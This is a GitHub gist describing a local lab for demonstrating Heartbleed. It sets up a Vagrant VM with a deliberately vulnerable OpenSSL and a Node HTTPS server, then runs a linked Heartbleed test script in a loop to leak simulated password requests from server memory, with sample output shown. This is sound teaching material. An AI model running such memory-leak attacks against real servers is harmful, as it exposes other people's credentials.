Skip to content

Instantly share code, notes, and snippets.

@torgeir

torgeir/a-heartbleed-locally-using-vagrant-nodejs-and-a-vulnerable-openssl.md

Last active August 29, 2015 13:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save torgeir/10536529 to your computer and use it in GitHub Desktop.
Save torgeir/10536529 to your computer and use it in GitHub Desktop.
Download ZIP
Test heartbleed locally using vagrant, node.js and a vulnerable openssl.
Raw
a-heartbleed-locally-using-vagrant-nodejs-and-a-vulnerable-openssl.md

  1. Setup vagrant

    vagrant init hashicorp/precise32

  2. Make the vagrant config change (on your local computer, see Vagrantfile)

    vagrant up

    vagrant ssh

  3. Install the required software (on the vagrant box)

    sudo apt-get update

    sudo apt-get install openssl=1.0.1-4ubuntu3 nodejs git vim

  4. Clone node (on the vagrant box, see server.js)

    git clone https://github.com/joyent/node

    cd node

  5. Create the server.js (on the vagrant box), then run it

    node server.js

  6. Start making requests (from your local computer, see make-requests-against-your-node-server.sh)

  7. Run the heartbleed test-script (from your local computer, see example-output.txt)

Screenshot: http://cl.ly/image/1B082v0b1Q3K

Now run away and change your passwords! :)

Raw
example-output.txt
$ while true; do ./hb-test.py localhost -p 3000 | grep pass; done
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 31 39 33 GET /?passwd=193
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 32 32 35 GET /?passwd=225
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 32 38 30 GET /?passwd=280
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 32 37 35 GET /?passwd=275
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 32 34 31 GET /?passwd=241
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 39 33 37 GET /?passwd=937
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 31 32 35 GET /?passwd=125
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 31 33 32 GET /?passwd=132
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 33 30 30 GET /?passwd=300
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 31 30 36 GET /?passwd=106
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 39 37 35 GET /?passwd=975
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 31 31 36 GET /?passwd=116
0010: 47 45 54 20 2F 3F 70 61 73 73 77 64 3D 32 32 35 GET /?passwd=225
Raw
extract-data-with-heartbleed.sh
# use one of the many heartbleed tests scripts on github
# e.g. https://github.com/decal/ssltest-stls/blob/master/ssltest-stls.py
#
# I renamed it hb-test.py
chmod u+x hb-test.py
while true; do ./hb-test.py localhost -p 3000 | grep pass; done
Raw
make-requests-against-your-node-server.sh
while true; do curl -k https://localhost:3000?passwd=$RANDOM; sleep 0.1; done
Raw
make-Vagrantfile-change.rb
# Add this line to the Vagrantfile to expose port 3000 on your localhost:3000
Vagrant.configure("2") do |config|
config.vm.network "forwarded_port", guest: 3000, host: 3000
end
Raw
server.js
// http://nodejs.org/docs/latest/api/https.html#https_https_createserver_options_requestlistener
// curl -k https://localhost:3000/
var https = require('https');
var fs = require('fs');
var options = {
key: fs.readFileSync('./test/fixtures/keys/agent2-key.pem'),
cert: fs.readFileSync('./test/fixtures/keys/agent2-cert.pem')
};
https.createServer(options, function (req, res) {
res.writeHead(200);
var url = req.url;
if (~url.indexOf('pass')) {
res.end("here's a little memory for you\n");
return
}
res.end("helloo world\n");
}).listen(3000);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment